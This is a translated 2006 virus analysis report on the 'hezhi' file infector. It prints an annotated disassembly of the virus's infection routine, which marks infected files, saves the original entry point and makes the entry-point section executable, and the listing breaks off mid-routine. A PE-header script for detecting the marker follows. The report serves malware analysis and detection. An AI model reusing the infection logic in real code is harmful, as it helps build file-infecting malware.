hezhi Virus Analysis Report
Author: unknown   Source: 黑客动画吧   Updated: 2006-3-18
```asm
00412B11  3C 05              CMP AL,5
00412B13  74 04              JE SHORT CLSPACK.00412B19
00412B15  FEC3               INC BL
00412B17  EB 05              JMP SHORT CLSPACK.00412B1E
00412B19  80E2 03            AND DL,3
00412B1C  8ADA               MOV BL,DL
00412B1E  83E0 07            AND EAX,7
00412B21  83E3 07            AND EBX,7
00412B24  83E1 07            AND ECX,7
00412B27  E8 6C050000        CALL CLSPACK.00413098           ; this CALL generates random code from the random numbers produced above (it contains a table)
00412B2C  5A                 POP EDX
00412B2D  59                 POP ECX
00412B2E  5B                 POP EBX
00412B2F  58                 POP EAX
00412B30  81E3 FF0F0000      AND EBX,0FFF
00412B36  899F 7F100000      MOV DWORD PTR DS:[EDI+107F],EBX
00412B3C  B9 46310000        MOV ECX,3146
00412B41  2BCB               SUB ECX,EBX
00412B43  898F 85100000      MOV DWORD PTR DS:[EDI+1085],ECX
00412B49  59                 POP ECX
00412B4A  5B                 POP EBX
00412B4B  8987 8F100000      MOV DWORD PTR DS:[EDI+108F],EAX
00412B51  66:C746 09 54C3    MOV WORD PTR DS:[ESI+9],0C354   ; write the infection marker; this position is the PE file's TimeDateStamp
00412B57  8B46 28            MOV EAX,DWORD PTR DS:[ESI+28]   ; original AddressOfEntryPoint
00412B5A  8987 5F060000      MOV DWORD PTR DS:[EDI+65F],EAX  ; heh, at offset +65F in the decrypted virus body you can see the lovely entry address
00412B60  8B46 38            MOV EAX,DWORD PTR DS:[ESI+38]   ; SectionAlignment
00412B63  8987 942E0000      MOV DWORD PTR DS:[EDI+2E94],EAX
00412B69  8B46 34            MOV EAX,DWORD PTR DS:[ESI+34]   ; ImageBase
00412B6C  8987 B2300000      MOV DWORD PTR DS:[EDI+30B2],EAX
00412B72  8D5E 18            LEA EBX,DWORD PTR DS:[ESI+18]   ; Magic
00412B75  33D2               XOR EDX,EDX
00412B77  66:8B56 14         MOV DX,WORD PTR DS:[ESI+14]     ; SizeOfOptionalHeader
00412B7B  03DA               ADD EBX,EDX                     ; EBX -> first section header
00412B7D  33C9               XOR ECX,ECX
00412B7F  66:8B4E 06         MOV CX,WORD PTR DS:[ESI+6]      ; NumberOfSections
00412B83  8B46 28            MOV EAX,DWORD PTR DS:[ESI+28]   ; AddressOfEntryPoint
00412B86  8B53 0C            MOV EDX,DWORD PTR DS:[EBX+C]    ; VirtualAddress
00412B89  3BC2               CMP EAX,EDX
00412B8B  72 07              JB SHORT CLSPACK.00412B94       ; if AddressOfEntryPoint
00412B8D  0353 08            ADD EDX,DWORD PTR DS:[EBX+8]    ; VirtualSize
00412B90  3BC2               CMP EAX,EDX
00412B92  76 18              JBE SHORT CLSPACK.00412BAC      ; jump if the entry point lies within the current section
00412B94  83C3 28            ADD EBX,28
00412B97  ^E2 EA             LOOPD SHORT CLSPACK.00412B83
00412B99  80BF A02E0000 01   CMP BYTE PTR DS:[EDI+2EA0],1
00412BA0  74 05              JE SHORT CLSPACK.00412BA7
00412BA2  E9 43030000        JMP CLSPACK.00412EEA
00412BA7  E9 F5190000        JMP CLSPACK.004145A1
00412BAC  50                 PUSH EAX
00412BAD  52                 PUSH EDX
00412BAE  05 00020000        ADD EAX,200
00412BB3  8B53 0C            MOV EDX,DWORD PTR DS:[EBX+C]    ; VirtualAddress
00412BB6  0353 10            ADD EDX,DWORD PTR DS:[EBX+10]   ; SizeOfRawData
00412BB9  3BC2               CMP EAX,EDX
00412BBB  5A                 POP EDX
00412BBC  58                 POP EAX
00412BBD  77 24              JA SHORT CLSPACK.00412BE3
00412BBF  50                 PUSH EAX
00412BC0  0346 34            ADD EAX,DWORD PTR DS:[ESI+34]   ; ImageBase
00412BC3  8987 18060000      MOV DWORD PTR DS:[EDI+618],EAX  ; ImageBase+AddressOfEntryPoint
00412BC9  8B43 24            MOV EAX,DWORD PTR DS:[EBX+24]   ; Characteristics
00412BCC  0D 00000020        OR EAX,20000000                 ; IMAGE_SCN_MEM_EXECUTE
00412BD1  8943 24            MOV DWORD PTR DS:[EBX+24],EAX   ; write back
00412BD4  58                 POP EAX                         ; AddressOfEntryPoint
00412BD5  2B43 0C            SUB EAX,DWORD PTR DS:[EBX+C]    ; EAX - VirtualAddress
00412BD8  0343 14            ADD EAX,DWORD PTR DS:[EBX+14]   ; PointerToRawData
00412BDB  8987 A22E0000      MOV DWORD PTR DS:[EDI+2EA2],EAX ; EAX -> file offset
00412BE1  EB 2F              JMP SHORT CLSPACK.00412C12
00412BE3  50                 PUSH EAX
00412BE4
```
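As an added example (not part of the original report), the Python script below reads the same PE header fields the routine above uses: it checks for the 0C354 marker at PE header offset 9, locates the section that contains AddressOfEntryPoint with the same bounds test as the JB/JBE loop, reports whether that section carries IMAGE_SCN_MEM_EXECUTE, and computes the entry point's file offset the way the listing does. The image it parses is a constructed, headers-only PE32 built inline, so the script runs without a real binary.

```python
import struct

INFECTION_MARKER = 0xC354           # word the virus writes at PE header offset 9 (inside TimeDateStamp)
IMAGE_SCN_MEM_EXECUTE = 0x20000000  # flag the virus ORs into the section holding the entry point

def analyze_pe(data: bytes) -> dict:
    """Read the header fields the infection routine uses and flag the marker it leaves behind."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]                  # e_lfanew -> "PE\0\0"
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", data, pe + 0x06)[0]   # NumberOfSections
    marker = struct.unpack_from("<H", data, pe + 0x09)[0]         # where MOV WORD PTR [ESI+9],0C354 lands
    size_opt = struct.unpack_from("<H", data, pe + 0x14)[0]       # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe + 0x28)[0]          # AddressOfEntryPoint
    info = {"marker_present": marker == INFECTION_MARKER, "entry_rva": entry,
            "image_base": struct.unpack_from("<I", data, pe + 0x34)[0],
            "section_alignment": struct.unpack_from("<I", data, pe + 0x38)[0],
            "entry_section": None, "entry_file_offset": None, "entry_section_executable": None}
    first = pe + 0x18 + size_opt                                  # LEA EBX,[ESI+18] ; ADD EBX,EDX
    for i in range(num_sections):
        s = first + i * 40
        vsize, va, _, raw_ptr = struct.unpack_from("<IIII", data, s + 0x08)
        chars = struct.unpack_from("<I", data, s + 0x24)[0]
        if va <= entry <= va + vsize:                             # the listing's JB / JBE pair
            info["entry_section"] = i
            info["entry_file_offset"] = entry - va + raw_ptr      # EAX - VirtualAddress + PointerToRawData
            info["entry_section_executable"] = bool(chars & IMAGE_SCN_MEM_EXECUTE)
            break
    return info

def build_sample_pe(infected: bool) -> bytes:
    """Constructed, headers-only PE32 image used as sample input (not a real binary)."""
    buf = bytearray(b"MZ".ljust(0x3C, b"\0")) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    buf += struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 2, 0x45000000, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                                       # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1010)                                      # entry point inside .text
    struct.pack_into("<III", opt, 0x1C, 0x400000, 0x1000, 0x200)                   # ImageBase, SectionAlignment, FileAlignment
    buf += opt
    for name, vsize, va, rsize, rptr, chars in ((b".text", 0x500, 0x1000, 0x600, 0x400, 0x60000020),
                                                 (b".data", 0x200, 0x2000, 0x200, 0xA00, 0xC0000040)):
        buf += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, rsize, rptr, 0, 0, 0, 0, chars)
    if infected:                                                                   # replay the marker write
        struct.pack_into("<H", buf, 0x40 + 0x09, INFECTION_MARKER)
    return bytes(buf)
```

On the clean sample the entry point 0x1010 resolves to section 0 at file offset 0x410; on the infected sample only the marker differs, which is exactly what a scanner for this family would key on.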
Entered by: IceRiver   Editor: admin